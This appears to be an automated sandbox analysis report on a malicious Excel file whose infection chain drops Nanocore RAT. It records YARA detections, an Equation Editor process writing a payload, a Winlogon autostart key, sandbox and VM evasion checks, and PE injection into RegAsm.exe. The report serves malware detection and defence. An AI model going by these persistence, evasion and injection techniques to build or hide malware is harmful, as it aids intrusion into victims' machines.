          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2207997590.0000000000DF2000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.2148408702.0000000000DF2000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208071587.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY
          Source: Yara matchFile source: C:\Users\Public\vbc.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\win33.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe, type: DROPPED
          Source: Yara matchFile source: 4.2.vbc.exe.df0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.df0000.0.unpack, type: UNPACKEDPE
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04A0367C push edi; retf
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_003C523F push cs; iretd
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 5_2_00CD3D8A push dword ptr [esp+ecx-75h]; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.98582259438
          Source: initial sampleStatic PE information: section name: .text entropy: 7.98582259438
          Source: new[1].exe.2.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.csHigh entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
          Source: new[1].exe.2.dr, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.csHigh entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
          Source: win33.exe.4.dr, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.csHigh entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
          Source: win33.exe.4.dr, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.csHigh entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
          Source: 4.2.vbc.exe.df0000.3.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.csHigh entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
          Source: 4.2.vbc.exe.df0000.3.unpack, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.csHigh entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
          Source: 4.0.vbc.exe.df0000.0.unpack, eUnEQpPUQit5jSTQYO/C7A56p5KOPoLNTOEQM.csHigh entropy of concatenated method names: '.cctor', 'zqgic31sZ', 'OE1LXhAJf', 'rTlgnm26K', 'yXe9vKN53', 'HgYWLlYwd', 'OOoeUTCVM', 'Hn9GJ4JDT', 'RlTh8Xoso', 'f5YbYq4yk'
          Source: 4.0.vbc.exe.df0000.0.unpack, Gwb8v4YxZqC6FEkpMk/mORTpnCQJ3B7vbp15A.csHigh entropy of concatenated method names: '.ctor', 'D2c22Wn99', 'le7MU2Fw5', 'CDrt6kaG8', 'lMB3nusPW', 'GZ60NKJ5c', 'o9Y2qKfZ5AfavGDQhT6', 'bUC817fVwETYWgUdPFR', 'DWb9RqfqoNLd8Pf9HAi', 'gyuxNCfxp7eWogKQX1I'
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 5.2.RegAsm.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 5.0.RegAsm.exe.400000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 5.0.RegAsm.exe.400000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\win33.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Users\Public\vbc.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Temp\RegAsm.exe:Zone.Identifier read attributes | delete
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: Ref 0180066743.xlsxStream path 'EncryptedPackage' entropy: 7.99983137636 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 7692
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 1664
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: foregroundWindowGot 379
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2572Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2840Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 1772Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
          Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
          Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2208178759.000000000236B000.00000004.00000001.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Allocates memory in foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
          Writes to foreign memory regionsShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 7EFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm4
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm
          Source: RegAsm.exe, 00000005.00000002.2364980071.0000000002D0A000.00000004.00000001.sdmpBinary or memory string: Program Manager
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cmp
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm0
          Source: RegAsm.exe, 00000005.00000002.2364643075.0000000002AD1000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm`/
          Source: RegAsm.exe, 00000005.00000002.2364029644.0000000001060000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm\
          Source: RegAsm.exe, 00000005.00000002.2364643075.0000000002AD1000.00000004.00000001.sdmpBinary or memory string: Program ManagerL
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cmx
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cmtz
          Source: RegAsm.exe, 00000005.00000002.2365016404.0000000002D0E000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm8
          Source: RegAsm.exe, 00000005.00000002.2364643075.0000000002AD1000.00000004.00000001.sdmpBinary or memory string: Program Manager48CmD
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager8
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm$
          Source: RegAsm.exe, 00000005.00000002.2364029644.0000000001060000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48CmH9
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cml>
          Source: RegAsm.exe, 00000005.00000002.2364700229.0000000002B38000.00000004.00000001.sdmpBinary or memory string: Program Manager48CmX,
          Source: RegAsm.exe, 00000005.00000002.2365541141.0000000002FE9000.00000004.00000001.sdmpBinary or memory string: Program Manager\
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm<4
          Source: RegAsm.exe, 00000005.00000002.2365076324.0000000002D78000.00000004.00000001.sdmpBinary or memory string: Program Manager48Cm80
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
